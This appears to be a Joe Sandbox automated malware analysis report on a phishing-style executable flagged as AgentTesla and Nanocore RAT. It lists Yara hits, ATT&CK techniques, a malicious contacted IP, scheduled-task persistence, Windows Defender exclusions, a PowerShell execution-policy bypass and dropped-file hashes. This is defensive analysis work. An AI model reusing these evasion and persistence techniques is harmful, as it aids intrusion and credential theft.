                  Source: Yara matchFile source: 0000001D.00000002.574363580.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 0000001D.00000000.485797688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000000.487776252.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000000.486771579.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000000.484899643.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.564381690.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.493963326.00000000042D9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.574363580.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
                  Yara detected Nanocore RATShow sources
                  Source: Yara matchFile source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsScheduled Task/Job2Scheduled Task/Job2Process Injection12Masquerading1Input Capture1Security Software Discovery11Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScripting1Boot or Logon Initialization ScriptsScheduled Task/Job2Disable or Modify Tools11LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsPowerShell2Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonScripting1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing23Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 551470 Sample: RFQ_GGMC-Ref 12-01-2022.exe Startdate: 12/01/2022 Architecture: WINDOWS Score: 100 61 89.238.150.43, 49720, 49722, 49723 M247GB United Kingdom 2->61 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 14 other signatures 2->69 10 RFQ_GGMC-Ref 12-01-2022.exe 7 2->10         started        14 mozille.exe 2->14         started        signatures3 process4 file5 55 C:\Users\user\AppData\...\lhWbLvHNlciwu.exe, PE32 10->55 dropped 57 C:\Users\user\AppData\Local\...\tmp71CD.tmp, XML 10->57 dropped 59 C:\Users\...\RFQ_GGMC-Ref 12-01-2022.exe.log, ASCII 10->59 dropped 71 Adds a directory exclusion to Windows Defender 10->71 16 RFQ_GGMC-Ref 12-01-2022.exe 6 10->16         started        19 powershell.exe 19 10->19         started        21 schtasks.exe 1 10->21         started        23 RFQ_GGMC-Ref 12-01-2022.exe 10->23         started        25 powershell.exe 14->25         started        27 schtasks.exe 14->27         started        signatures6 process7 file8 53 C:\Users\user\AppData\Local\...\mozille.exe, PE32 16->53 dropped 29 cmd.exe 1 16->29         started        32 cmd.exe 1 16->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 25->38         started        process9 signatures10 75 Suspicious powershell command line found 29->75 77 Bypasses PowerShell execution policy 29->77 40 conhost.exe 29->40         started        42 schtasks.exe 1 29->42         started        44 mozille.exe 32->44         started        47 conhost.exe 32->47         started        49 timeout.exe 32->49         started        process11 signatures12 73 Adds a directory exclusion to Windows Defender 44->73 51 powershell.exe 44->51         started        process13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  RFQ_GGMC-Ref 12-01-2022.exe26%VirustotalBrowse

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack100%AviraTR/Dropper.GenDownload File
                  7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack100%AviraTR/Dropper.GenDownload File
                  7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack100%AviraTR/Dropper.GenDownload File
                  7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                  7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack100%AviraTR/Dropper.GenDownload File
                  7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpack100%AviraTR/Dropper.GenDownload File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://micolous.id.au/projects/bf210%Avira URL Cloudsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.totalbf2142.com/forums/showthread.php?t=53420%Avira URL Cloudsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://micolous.id.au/projects/bf2142/.0%Avira URL Cloudsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://micolous.id.au0%Avira URL Cloudsafe
                  http://micolous.id.au/projects/bf2142/0%Avira URL Cloudsafe
                  http://igaeJZ.so0%Avira URL Cloudsafe
                  http://www.pcgamingboards.com/smf/index.php?topic=129.msg279#msg2790%Avira URL Cloudsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://micolous.id.au/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.fontbureau.com/designersGRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                    high
                    http://igaeditor.sourceforge.net/wiki/mozille.exefalse
                      high
                      http://ati.amd.com/developer/compressonator.htmlmozille.exefalse
                        high
                        http://www.fontbureau.com/designers/?RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                          high
                          https://sourceforge.net/project/showfiles.php?group_id=181663Mhttp://igaeditor.sourceforge.net/wiki/RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/bTheRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers?RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                              high
                              http://www.radgametools.com/bnkdown.htmmozille.exefalse
                                high
                                http://developer.nvidia.com/object/dds_thumbnail_viewer.htmlmozille.exefalse
                                  high
                                  http://micolous.id.au/projects/bf21mozille.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.tiro.comRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designersRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.goodfont.co.krRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.gimp.org/windows/mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                                      high
                                      http://www.sajatypeworks.comRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.typography.netDRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cn/cTheRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.totalbf2142.com/forums/showthread.php?t=5342mozille.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://sourceforge.net/svn/?group_id=181663mozille.exefalse
                                        high
                                        http://www.galapagosdesign.com/DPleaseRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://micolous.id.au/projects/bf2142/.RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fonts.comRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.sandoll.co.krRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.urwpp.deDPleaseRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.zhongyicts.com.cnRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.360806225.0000000002B36000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sakkal.comRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://micolous.id.aumozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://micolous.id.au/projects/bf2142/RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.341191488.0000000006C10000.00000004.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.396925002.0000000006750000.00000004.00020000.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.apache.org/licenses/LICENSE-2.0RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.comRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                high
                                                http://igaeditor.sourceforge.net/mozille.exe, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmpfalse
                                                  high
                                                  http://igaeditor.sourceforge.net/latest.txtmozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                                                    high
                                                    http://igaeJZ.soRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.pcgamingboards.com/smf/index.php?topic=129.msg279#msg279mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://igaeditor.sourceforge.net/ohttp://www.totalbf2142.com/forums/showthread.php?t=5342RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                                                      high
                                                      http://www.carterandcone.comlRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlNRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cnRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/frere-jones.htmlRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://registry.gimp.org/plugin?id=4816mozille.exefalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://sourceforge.net/project/showfiles.php?group_id=181663mozille.exefalse
                                                              high
                                                              http://www.fontbureau.com/designers8RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://developer.nvidia.com/object/photoshop_dds_plugins.htmlmozille.exefalse
                                                                  high
                                                                  http://developer.nvidia.com/object/photoshop_dds_plugins.htmlyhttp://developer.nvidia.com/object/ddsRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                                                                    high
                                                                    http://micolous.id.au/RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.341191488.0000000006C10000.00000004.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.396925002.0000000006750000.00000004.00020000.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown

                                                                    Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    89.238.150.43
                                                                    unknownUnited Kingdom
                                                                    9009M247GBtrue

                                                                    General Information

                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                    Analysis ID:551470
                                                                    Start date:12.01.2022
                                                                    Start time:09:01:01
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 14m 8s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:light
                                                                    Sample file name:RFQ_GGMC-Ref 12-01-2022.exe
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:46
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@53/16@0/1
                                                                    EGA Information:
                                                                    • Successful, ratio: 60%
                                                                    HDC Information:
                                                                    • Successful, ratio: 0.2% (good quality ratio 0%)
                                                                    • Quality average: 12.9%
                                                                    • Quality standard deviation: 33.5%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    • Found application associated with file extension: .exe
                                                                    Warnings:
                                                                    Show All
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                    • TCP Packets have been reduced to 100
                                                                    • Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.147, 173.222.108.226
                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
                                                                    • Execution Graph export aborted for target RFQ_GGMC-Ref 12-01-2022.exe, PID 6948 because it is empty
                                                                    • Execution Graph export aborted for target RFQ_GGMC-Ref 12-01-2022.exe, PID 7000 because there are no executed function
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    09:02:09API Interceptor1x Sleep call for process: RFQ_GGMC-Ref 12-01-2022.exe modified
                                                                    09:02:13API Interceptor138x Sleep call for process: powershell.exe modified
                                                                    09:02:31Task SchedulerRun new task: mozille path: "C:\Users\user\AppData\Local\Temp\mozille.exe"
                                                                    09:02:37API Interceptor4x Sleep call for process: mozille.exe modified
                                                                    09:03:24API Interceptor164x Sleep call for process: jzhlgt.exe modified
                                                                    09:03:41API Interceptor33x Sleep call for process: dlliok.exe modified
                                                                    09:03:59Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\dlliok.exe" s>$(Arg0)

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    No context

                                                                    Domains

                                                                    No context

                                                                    ASN

                                                                    No context

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ_GGMC-Ref 12-01-2022.exe.log
                                                                    Process:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):1310
                                                                    Entropy (8bit):5.345651901398759
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                                                                    MD5:D918C6A765EDB90D2A227FE23A3FEC98
                                                                    SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                                                                    SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                                                                    SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mozille.exe.log
                                                                    Process:C:\Users\user\AppData\Local\Temp\mozille.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1310
                                                                    Entropy (8bit):5.345651901398759
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                                                                    MD5:D918C6A765EDB90D2A227FE23A3FEC98
                                                                    SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                                                                    SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                                                                    SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
